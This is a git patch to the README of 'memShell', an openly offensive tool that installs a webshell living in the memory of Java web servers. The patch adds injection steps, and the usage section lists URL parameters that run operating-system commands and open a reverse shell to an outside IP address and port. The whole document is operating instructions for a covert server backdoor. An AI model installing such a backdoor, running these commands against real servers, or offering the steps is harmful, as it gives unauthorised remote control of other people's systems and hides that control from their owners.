From 4c461fdceaa69ba3fa538f9915ba2b71c428e215 Mon Sep 17 00:00:00 2001 From: rebeyond <5929401@qq.com> Date: Thu, 24 May 2018 20:24:01 -0700 Subject: [PATCH] add install --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 15df297..17be88f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,11 @@ # memShell a webshell resides in the memory of java web server -# Usage +# install +* unzip memShell.zip +* cd memShell +* java -jar inject.jar +# usage * anyurl?pwd=pass //show this help page. * anyurl?pwd=pass&model=exec&cmd=whoami //run os command. * anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.